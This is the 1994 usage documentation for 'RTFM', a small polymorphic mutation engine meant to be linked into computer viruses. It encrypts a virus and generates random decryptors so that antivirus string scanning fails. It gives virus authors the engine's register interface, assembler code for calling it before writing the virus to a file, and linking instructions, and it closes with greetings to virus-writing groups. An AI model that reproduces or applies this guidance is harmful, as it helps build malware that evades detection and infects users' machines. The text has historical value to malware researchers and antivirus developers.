Rajaat's Tiny Flexible Mutator [RTFM]
Version 1.0
(C) 1994 Rajaat
-------------------------------------


What is it?
-----------

RTFM is an object module that can be linked to your virus to make
it impossible for a scanner to use a simple string. It will encrypt
your virus and generate a random decryptor using random registers
and random instructions. Therefore, an algorithmic approach will be
needed to detect viruses using this object module.

How to use it
-------------

RTFM is very easy to use, and regular assembler users will have no
problem using this routine. RTFM needs some input registers and will
give some return values after processing.

Input
-----

DS:SI = piece of code to encrypt
ES:SI = place of decryptor+encrypted code
CX    = length of code (including the mutator (mut_len))
BX    = offset of decryptor in file
AX    = flag bits
        bit 0 = 1: do not use junk code

Output
------

DS:DX = place of decryptor+encrypted code
CX    = length of encrypted code+decryptor
BP    = preserved
Other registers might be trashed

Put this at the start of your virus code
----------------------------------------

        extrn mut_top:near, mut_bottom:near, mut_len:abs
        extrn rnd_init:near, rnd_get:near
        extrn mutate:near

Before writing the virus to a file, call the engine with these parameters
-------------------------------------------------------------------------

        mov si,offset virusstart     ; with non-resident virii
                                     ; you will need a delta offset

        mov di,offset workspace      ; make sure you point this to
                                     ; an area that has enough space
                                     ; for the virus (including
                                     ; the mutation engine) and the
                                     ; decryptor

        mov cx,viruslength+mut_len   ; the length of the virus (and
                                     ; the length of the mutation
                                     ; engine)

        mov bx,absstart              ; absolute start of the
                                     ; decryptor

        xor ax,ax                    ; no flags set

        call mutate                  ; and mutate!

Linking the module
------------------

To link RTFM to your virus, use TLINK from Borland. Use the following
syntax:

        TLINK /T MYVIRUS+RME10

Notes
-----

RTFM was not meant to make an unscannable virus; its only purpose is
to make string scanning impossible. The code generated by RTFM is by
no means extremely polymorphic, and it will not be very difficult to
devise an algorithm to detect viruses using RTFM. The size of RTFM is
smaller than 650 bytes. This is not too big.

History
-------

1.0  initial version

Greetings
---------

Omega [AD], NuKE, Phalcon/Skism, Immortal Riot, TridenT, VLAD, YAM,
Trinity, Zerial, DNA and all other virus writers I forgot!